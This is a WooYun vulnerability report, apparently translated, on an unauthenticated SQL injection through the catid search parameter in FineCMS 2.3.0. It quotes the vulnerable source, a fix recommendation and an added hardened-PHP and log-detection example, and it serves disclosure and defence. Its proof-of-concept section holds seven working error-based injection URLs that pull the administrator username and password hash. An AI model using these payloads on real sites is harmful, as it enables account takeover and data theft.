
Vulnerability summary

Defect ID: wooyun-2014-060196

Vulnerability title: FineCMS design flaw leads to widespread SQL injection

Related vendor: dayrui.com

Vulnerability author: xfkxfk

Submitted: 2014-05-12 11:47

Fix time: 2014-08-10 11:48

Public disclosure: 2014-08-10 11:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: Vendor has confirmed

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-05-12: Details sent to the vendor, awaiting the vendor's handling
2014-05-12: Vendor has confirmed; details disclosed to the vendor only
2014-05-15: Details opened to third-party security partners
2014-07-06: Details disclosed to core white hats and experts in the relevant field
2014-07-16: Details disclosed to regular white hats
2014-07-26: Details disclosed to intern white hats
2014-08-10: Details disclosed to the public

Brief description:

FineCMS design flaw leads to widespread SQL injection

Detailed description:

The latest FineCMS release is 2.3.0, officially updated on 18 April 2014.
One FineCMS feature is vulnerable to SQL injection. No login is required, and the injection directly yields the administrator account.
This feature is used by several modules, so the injection surfaces on a large scale.
The same code is used throughout the CMS, so the vulnerability exists in many places.
File /FineCMSv2.3.0/dayrui/core/D_Module.php:

/**
 * Module content search page
 */
protected function _search() {

    $this->load->model('search_model');
    $mod = $this->get_cache('module-'.SITE_ID.'-'.APP_DIR);
    // Clear expired cache
    $this->search_model->clear($mod['setting']['search']['cache']);
    // Search parameters
    $get = $this->input->get(NULL, TRUE);
    $get = isset($get['rewrite']) ? dr_rewrite_decode($get['rewrite']) : $get;
    $id = $get['id'];
    $catid = (int)$get['catid'];
    $get['keyword'] = str_replace(array('%', ' '), array('', '%'), $get['keyword']);
    unset($get['c'], $get['m'], $get['id'], $get['page']);
    // Check keyword length
    if ($get['keyword'] && strlen($get['keyword']) < (int)$mod['setting']['search']['length']) {
        $this->msg(lang('mod-31'));
    }
    if ($id) { // Read cached data
        $data = $this->search_model->get($id);
        $catid = $data['catid'];
        $data['get'] = $data['params'];
        if (!$data) {
            $this->msg(lang('mod-32'));
        }
    } else { // Build search conditions
        $data = $this->search_model->set($get);
    }
    list($parent, $related) = $this->_related_cat($mod, $catid);
    $urlrule = $mod['setting']['search']['rewrite'] ? 'search-id-{id}-page-{page}.html' : 'index.php?c=search&id={id}&page={page}';
    $this->template->assign(dr_category_seo($mod, $mod['category'][$catid], max(1, (int)$this->input->get('page'))));
    $this->template->assign(array(
        'get' => $get,
        'cat' => $mod['category'][$catid],
        'caitd' => $catid,
        'parent' => $parent,
        'related' => $related,
        'keyword' => $get['keyword'],
        'urlrule' => str_replace('{id}', $data['id'], $urlrule),
    ));
    $this->template->assign($data);
    $this->template->display('search.html');
}

/**
 * Top-level categories available to the current member
 */
public function show_select_category() {

    $data = array();
    $category = $this->get_cache('module-'.SITE_ID.'-'.APP_DIR, 'category');

    foreach ($category as $t) {
        if (!$t['child'] && $t['permission'][$this->member['mark']]['add']) {
            $pids = explode(',', $t['pids']);
            $pid = (int)$pids[1];
            if (isset($category[$pid])) {
                $category[$pid]['mark'] = 1;
                $data[$pid] = $category[$pid];
            }
        }
    }

    $this->template->assign(array(
        'id' => 2,
        'list' => $data
    ));
    $this->template->display('category_select.html');
}


The GET parameters are processed when the search conditions are built.
File /FineCMS v2.3.0/dayrui/models/Search_model.php:

public function set($get) {

    // Query table names
    $table = $this->db->dbprefix(SITE_ID.'_'.APP_DIR);
    $table_more = $this->db->dbprefix(SITE_ID.'_'.APP_DIR.'_category_data');
    .........
    // Category fields
    if ($get['catid']) {
        $more = FALSE;
        $cat_field = $module['category'][$get['catid']]['field'];
        $where[0] = '`'.$table.'`.`catid`'.($module['category'][$get['catid']]['child'] ? 'IN ('.$module['category'][$get['catid']]['childids'].')' : '='.$get['catid']);
        if ($cat_field) {
            foreach ($cat_field as $name => $field) {
                if (isset($get[$name]) && $get[$name]) {
                    $more = TRUE;
                    $where[] = $this->_where($table_more, $name, $get[$name], $cat_field);
                }
                if (isset($_order_by[$name])) {
                    $more = TRUE;
                    $order_by[] = '`'.$table.'`.`'.$name.'` '.$_order_by[$name];
                }
            }
        }
        if ($more) $from.= ' LEFT JOIN `'.$table_more.'` ON `'.$table.'`.`id`=`'.$table_more.'`.`id`';
    }
.........


When the category fields are handled:

$where[0] = '`'.$table.'`.`catid`'.($module['category'][$get['catid']]['child'] ? 'IN ('.$module['category'][$get['catid']]['childids'].')' : '='.$get['catid']);


The catid parameter is concatenated into the WHERE clause without quoting or any other protection, which leads to SQL injection. Note that _search() casts its own local $catid to int, but the unmodified $get array, with the raw catid string, is what it passes to set(), so that cast never reaches the query.
This code is referenced from several modules, so multiple vulnerable entry points exist.
See the proof of vulnerability for specifics.

Proof of vulnerability:

First SQL injection, in the book module:

http://localhost/book/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000


Second SQL injection, in the down module:

http://localhost/down/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000


Third SQL injection, in the fang module:

http://localhost/fang/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000


Fourth SQL injection, in the news module:

http://localhost/news/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000


Fifth SQL injection, in the photo module:

http://localhost/photo/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000


Sixth SQL injection, in the special module:

http://localhost/special/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000


Seventh SQL injection, in the video module:

http://localhost/video/index.php?c=search&catid=23%20and%201=2%20AND%20(SELECT%203002%20FROM(SELECT%20COUNT(*),CONCAT((SELECT%20CONCAT(USERNAME,0x23,PASSWORD)%20FROM%20FINECMS_MEMBER%20LIMIT%200,1),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&price=1000,2000

Fix recommendation:

Filter the input and wrap catid in single quotes.

Copyright notice: please credit the source when reposting: xfkxfk@WooYun
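The following is an added example, not code from this report or from FineCMS. It rebuilds the catid clause construction from Search_model::set() as a stand-alone function and places a hardened version beside it. Because catid is a numeric identifier, the hardened builder does not rely on quoting a string (quotes without escaping still leave a string parameter injectable); it rejects anything that is not a string of digits, checks that the id exists in the module's category cache, and normalises the cached childids list to integers before interpolating it. A small helper for reviewing query strings from access logs is included as well. The function names, the table name, the category data and the log field layout are assumptions made for this example.

```php
<?php
// Added example (not FineCMS or WooYun code). Names, table name and
// category data are assumptions constructed for this illustration.

// Constructed stand-in for the module category cache ($module['category']):
// id => array('child' => has sub-categories, 'childids' => comma list)
function example_category_cache() {
    return array(
        23 => array('child' => 0, 'childids' => '23'),
        24 => array('child' => 1, 'childids' => '24,25,26'),
    );
}

// Vulnerable builder: mirrors the concatenation in Search_model::set().
// $catid arrives straight from $get['catid'] with no cast, so whatever
// follows the digits is appended verbatim to the WHERE clause.
function where_catid_vulnerable($table, array $category, $catid) {
    $has_child = isset($category[$catid]['child']) && $category[$catid]['child'];
    return '`' . $table . '`.`catid`' . ($has_child
        ? ' IN (' . $category[$catid]['childids'] . ')'
        : '=' . $catid);
}

// Hardened builder: catid is a numeric identifier, so validate it as one.
// Returns NULL when the value must be rejected; the caller should then
// stop and show an error instead of running the query.
function where_catid_safe($table, array $category, $catid) {
    // Only a plain string of digits is acceptable (no sign, space or quote).
    if (!ctype_digit((string) $catid)) {
        return null;
    }
    $catid = (int) $catid;
    // The id must be one the module actually knows about.
    if (!isset($category[$catid])) {
        return null;
    }
    if ($category[$catid]['child']) {
        // childids comes from the CMS's own cache, but normalise it to a
        // list of integers anyway so stored data never reaches SQL as text.
        $ids = array_map('intval', explode(',', $category[$catid]['childids']));
        return '`' . $table . '`.`catid` IN (' . implode(',', $ids) . ')';
    }
    return '`' . $table . '`.`catid`=' . $catid;
}

// Log review helper (assumption: the access log provides the query string
// as its own field). Flags search requests whose catid is not a plain
// integer, which is the shape the requests in this report take.
function search_catid_suspicious($query_string) {
    parse_str($query_string, $q);
    return isset($q['c'], $q['catid'])
        && $q['c'] === 'search'
        && !ctype_digit((string) $q['catid']);
}

$table    = 'finecms_1_news';      // constructed table name
$category = example_category_cache();
$hostile  = '23 and 1=2';          // constructed value, deliberately truncated

echo where_catid_vulnerable($table, $category, '23'), "\n";
echo where_catid_vulnerable($table, $category, $hostile), "\n"; // tail survives into the clause
var_dump(where_catid_safe($table, $category, $hostile));        // rejected
echo where_catid_safe($table, $category, '24'), "\n";
var_dump(search_catid_suspicious('c=search&catid=23%20and%201=2&price=1000,2000'));
var_dump(search_catid_suspicious('c=search&catid=23'));
```

Run it with the php command-line interpreter. The second echo shows the attacker-controlled tail carried into the clause by the vulnerable builder, while the hardened builder returns NULL for the same value and a clean IN list for category 24; the log helper flags the first query string and passes the second.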


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed at: 2014-05-12 14:04

Vendor reply:

It was already fixed last month.

Latest status:

None


Comments

  1. 2014-05-12 12:41 | wefgod ( Regular white hat | Rank:1807 Vulnerabilities:179 | Out of my depth )

    Here to watch the "large-scale" show

  2. 2014-05-12 12:56 | xfkxfk Verified white hat ( Core white hat | Rank:2179 Vulnerabilities:338 | Heh! )

    @wefgod Er, experts please take a detour~~~

  3. 2014-05-12 16:26 | wefgod ( Regular white hat | Rank:1807 Vulnerabilities:179 | Out of my depth )

    @xfkxfk Haha, nope, I'm no expert, so I won't take a detour

  4. 2014-06-02 22:52 | wefgod ( Regular white hat | Rank:1807 Vulnerabilities:179 | Out of my depth )

    Did you scare the vendor?

  5. 2014-06-02 22:53 | wefgod ( Regular white hat | Rank:1807 Vulnerabilities:179 | Out of my depth )

    "Already fixed last month", what is that about? Why would the vendor say that, did they get the news internally again?

  6. 2015-04-09 09:43 | Winck ( Passer-by | Rank:8 Vulnerabilities:2 | http://weibo.com/hackwinck hackwinck By... )

    You scared the vendor